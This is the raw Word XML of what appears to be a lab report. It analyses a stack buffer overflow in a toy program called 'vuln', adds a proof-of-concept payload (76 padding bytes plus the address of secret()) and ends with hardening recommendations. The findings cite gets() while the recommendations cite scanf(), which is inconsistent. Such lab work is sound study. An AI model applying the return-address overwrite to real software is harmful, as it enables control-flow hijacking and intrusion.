      <w:pPr>
        <w:ind w:left="1440" w:left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izz      # search for strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B21F71"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816985" cy="3256280"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
            <wp:docPr id="19" name="Picture 19" descr="in ra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in radar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2073">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc4113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7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radare2 results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="4A802C25">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc28059"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Proof-of-Concept Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="49B8F7F4">
      <w:pPr>
        <w:ind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Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Craft and run  payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E352C0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1680" w:leftChars="0" w:hanging="420" w:firstLine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python3 -c "import sys; sys.stdout.buffer.write(b'A'*76 + b'\x86\x91\x04\x08')" &gt; payload.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F605AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1680" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/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./vuln &lt; payload.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43840703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A*76</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> → padding to reach saved EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976BCA0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/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\x86\x91\x04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> → little-endian address of secret() (0x8049186)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F22AC">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="7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Program either segmentation faults or prints: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D97503A"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32780" cy="956310"/>
            <wp:effectExtent l="0" t="0" r="12700" b="3810"/>
            <wp:docPr id="18" name="Picture 18" descr="poc confir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poc confirme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F193F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc28927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Figure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8</w:t>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="19"/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confirming POC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="2C5A2A15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5" w:name="_Toc25716"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Summary of Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9352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68"/>
        <w:gridCol w:w="7384"/>
      </w:tblGrid>
      <w:tr w14:paraId="20491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31298FA">
            <w:pPr>
              <w:jc w:val="center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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7339" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C177B93">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D39B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311D8B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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7339" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BA31AFE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Buffer overflow in gets(buf)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4F47AD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AB68322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Offset to saved EIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7339" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3639CA8E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76 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="252BB2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342520E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Target function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7339" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0541304C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secret() at 0x8049186</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0FE376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FA27F8C">
            <w:pPr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Exploit Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7339" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ED72D52"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 w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Segmentation fault confirms EIP overwrite; PoC can redirect to secret()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A1B81BD">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc283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Table 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>.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rtl w:val="0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>Shows summary of findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="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2B2D116B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7" w:name="_Toc32459"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="72A698E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buffer overflow vulnerability was successfully analyzed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B6AB3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Offset to saved return address identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1244A7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Safe PoC payload demonstrates control over program flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA654A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:keepLines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200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc2445"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="3A29CEB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Avoid unsafe functions: Replace scanf("%s", buf) with safer alternatives like fgets(buf, sizeof(buf), stdin) to limit input size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5601C4CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Enable compiler protections: Use stack protection flags (-fstack-protector-strong), PIE (-fPIE), and ASLR to make exploitation harder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37816851">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Validate input: Always check and sanitize user input to ensure it does not exceed buffer size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10BFF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Use modern libraries: Consider using higher-level languages or libraries that handle memory safely to reduce the risk of buffer overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C5BF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Regular code review: Perform peer reviews and static analysis to identify potential vulnerabilities early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A00682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Practice safe exploit testing: Conduct exploit development only in isolated, controlled virtual environments to avoid accidental damage.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId6" w:type="default"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="576" w:footer="432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E">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pP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</w:p>
  <w:p w14:paraId="0000002F">
    <w:pPr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2D"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-671195</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-281305</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7788275" cy="1024255"/>
          <wp:effectExtent l="0" t="0" r="14605" b="12065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 preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect t="6796"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7788275" cy="102393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B52620"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="01B52620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1">
    <w:nsid w:val="04F7B257"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04F7B25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32"/>
        <w:szCs w:val="32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  <w:b/>
        <w:bCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28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2">
    <w:nsid w:val="083611DC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="083611D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31167B40"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="31167B4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385C87D5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="385C87D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3D8FE768"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3D8FE768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6">
    <w:nsid w:val="40FD6AC1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="40FD6AC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0D019E4"/>
    <w:rsid w:val="02017B58"/>
    <w:rsid w:val="023625B0"/>
    <w:rsid w:val="03F14D3F"/>
    <w:rsid w:val="083D1794"/>
    <w:rsid w:val="08C94FF8"/>
    <w:rsid w:val="0C203DF5"/>
    <w:rsid w:val="0E5B2055"/>
    <w:rsid w:val="0E880A3A"/>
    <w:rsid w:val="0E9512FB"/>
    <w:rsid w:val="16393EB4"/>
    <w:rsid w:val="1A514319"/>
    <w:rsid w:val="1B217891"/>
    <w:rsid w:val="1E93319C"/>
    <w:rsid w:val="213F068F"/>
    <w:rsid w:val="21B95DF1"/>
    <w:rsid w:val="229F7A26"/>
    <w:rsid w:val="25700DFA"/>
    <w:rsid w:val="2BB07A36"/>
    <w:rsid w:val="2C067F05"/>
    <w:rsid w:val="2D3F104B"/>
    <w:rsid w:val="2ED576A0"/>
    <w:rsid w:val="30CE7FA2"/>
    <w:rsid w:val="32134DB6"/>
    <w:rsid w:val="32A23217"/>
    <w:rsid w:val="33340711"/>
    <w:rsid w:val="354074ED"/>
    <w:rsid w:val="356928AF"/>
    <w:rsid w:val="40313E05"/>
    <w:rsid w:val="408F05F9"/>
    <w:rsid w:val="41C67479"/>
    <w:rsid w:val="42BE2BE5"/>
    <w:rsid w:val="451B3B9E"/>
    <w:rsid w:val="49E1738F"/>
    <w:rsid w:val="4BB77389"/>
    <w:rsid w:val="4DEC4CE8"/>
    <w:rsid w:val="4EC85950"/>
    <w:rsid w:val="4F1D2E5C"/>
    <w:rsid w:val="50770CC7"/>
    <w:rsid w:val="597E7B62"/>
    <w:rsid w:val="59BE7110"/>
    <w:rsid w:val="5B21121A"/>
    <w:rsid w:val="5D17062D"/>
    <w:rsid w:val="61F26C63"/>
    <w:rsid w:val="624A4733"/>
    <w:rsid w:val="661A0911"/>
    <w:rsid w:val="66640406"/>
    <w:rsid w:val="6AE17565"/>
    <w:rsid w:val="6BE73308"/>
    <w:rsid w:val="708966DF"/>
    <w:rsid w:val="716F4C2B"/>
    <w:rsid w:val="73B629EC"/>
    <w:rsid w:val="75DB288E"/>
    <w:rsid w:val="76101441"/>
    <w:rsid w:val="76FA5DB4"/>
    <w:rsid w:val="7CA10480"/>
    <w:rsid w:val="7D084EB2"/>
    <w:rsid w:val="7D274676"/>
    <w:rsid w:val="7D6E2658"/>
    <w:rsid w:val="7DE463B7"/>
    <w:rsid w:val="7F8673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Lines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="24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b/>
      <w:sz w:val="32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50" w:after="50"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b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link w:val="28"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24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spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/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0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12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4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="24"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1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6">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17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8">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="9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2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21">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="420" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="23">
    <w:name w:val="TableNormal"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="WPSOffice手动目录 1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">
    <w:name w:val="WPSOffice手动目录 2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6">
    <w:name w:val="WPSOffice手动目录 3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="27">
    <w:name w:val="_Style 12"/>
    <w:basedOn w:val="2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8">
    <w:name w:val="Heading 4 Char"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/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568</Words>
  <Characters>3222</Characters>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4480</CharactersWithSpaces>
  <Application>WPS Office_12.2.0.21936_F1E327BC-269C-435d-A152-05C5408002CA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2025-07-26T00:07:00Z</dcterms:created>
  <dc:creator>Mohammed</dc:creator>
  <cp:lastModifiedBy>For Google</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-03T13:56:24Z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6B352C2C8C46472B875ECBC159B12071_13</vt:lpwstr>
  </property>
</Properties>
</file>